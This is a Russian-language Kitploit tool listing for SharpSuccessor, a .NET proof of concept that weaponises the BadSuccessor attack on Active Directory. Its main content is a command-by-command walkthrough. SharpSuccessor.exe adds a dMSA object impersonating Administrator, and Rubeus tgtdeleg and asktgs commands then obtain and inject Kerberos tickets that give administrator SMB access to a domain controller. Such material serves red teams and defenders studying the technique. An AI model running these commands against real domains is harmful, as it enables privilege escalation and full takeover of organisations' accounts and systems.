Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SharpSuccessor — SharpSuccessor — это .NET Proof of Concept (POC) для полной weaponization атаки BadSuccessor Ювала Гордона (@YuG0rd) из Akamai. | Kitploit
Инструменты/GitHubGitHub/logangoins/sharpsuccessor
Повышение привилегийЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеУправление идентификацией и доступом (IAM)АутентификацияRed Teaming
GitHublogangoins/sharpsuccessor

SharpSuccessor

SharpSuccessor — это .NET Proof of Concept (POC) для полной weaponization атаки BadSuccessor Ювала Гордона (@YuG0rd) из Akamai.

Репозиторий
42170411 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SharpSuccessor

SharpSuccessor — это .NET-доказательство концепции (POC) для полной эксплуатации атаки BadSuccessor Юваля Гордона (@YuG0rd) от Akamai. Пользователь с низкими привилегиями, обладающий разрешением CreateChild на любое организационное подразделение (OU) в домене Active Directory и правом записи на целевой объект, может захватить учётную запись.

Используйте SharpSuccessor, чтобы добавить и подготовить объект dMSA, а также записать нужные атрибуты на целевую учётную запись, которую вы хотите имитировать:

root@kitploit:~
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

image

Запросите TGT в контексте текущего пользователя, в данном случае jdoe:

root@kitploit:~
Rubeus.exe tgtdeleg /nowrap

image

Затем используйте этот tgt для имитации учётной записи dMSA:

root@kitploit:~
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....

image

Теперь вы можете запросить сервисный билет в контексте Administrator для любого SPN, включая контроллеры домена, для пост-эксплуатации. Например, здесь я покажу привилегии администратора для SMB на контроллере домена:

root@kitploit:~
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...

image

Теперь, когда у нас есть билет в памяти, мы можем проверить доступ:

image

Помощь и вдохновение

Огромная благодарность Jim Sykora и Garrett Foster за вдохновение и помощь в создании этого инструмента!

Скачать инструмент